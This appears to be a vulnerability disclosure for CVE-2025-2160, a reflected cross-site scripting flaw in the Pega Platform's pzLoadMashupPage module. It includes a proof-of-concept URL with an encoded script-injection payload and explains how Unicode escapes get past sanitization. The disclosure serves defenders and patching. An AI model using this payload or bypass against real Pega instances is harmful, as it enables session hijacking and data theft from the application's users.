CVE-2025-2160

Name

Reflected Cross-Site Scripting

CVSS score

8.1 (High)

CVSS vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

Product name

Pega Platform

Confirmed exploitable versions

8.4.3 to Infinity 24.2.1

Researcher

Kacper Paluch, Maciej Włodarczyk, Jakub Sajniak

Description

Reflected Cross-Site Scripting vulnerability exists in the Pega Infinity Platform versions 8.4.3 to 24.2.1. The vulnerability is located within the pyActivity pzLoadMashupPage module, which improperly sanitizes input from a GET parameter. Standard sanitization can be bypassed using a combination of URL encoding and Unicode escape sequences. Successful exploitation requires victim interaction (e.g., clicking a malicious link) and could allow an attacker to modify or exfiltrate data from the affected application.
Special thanks to Jakub Sajniak for their insights on identifying XSS vulnerabilities in the Pega Platform by searching for `pyActivity` modules within application JavaScript files.

Proof-of-concept

Go to the following URL:
https://<pega_instance>/prweb/PRAuth/app/esg-comp/<uniqueID>*/!STANDARD?pyActivity=pzLoadMashupPage&Headers=%7b%22uniqueId123%22%3a%7b%22a%22%3a%5b%22b%22%2c%22c%5cu003c%2fscript%5cu003e%5cu003cscript%5cu003ealert(document.domain)%5cu003c%2fscript%5cu003e%22%5d%7d%7d

Timeline

17-12-2024 - Vulnerability reported to vendor
14-04-2025 - Security advisory is published by the vendor
16-09-2025 - PoC published

References

https://support.pega.com/support-doc/pega-security-advisory-d25-vulnerability-remediation-note
https://www.cve.org/CVERecord?id=CVE-2025-2160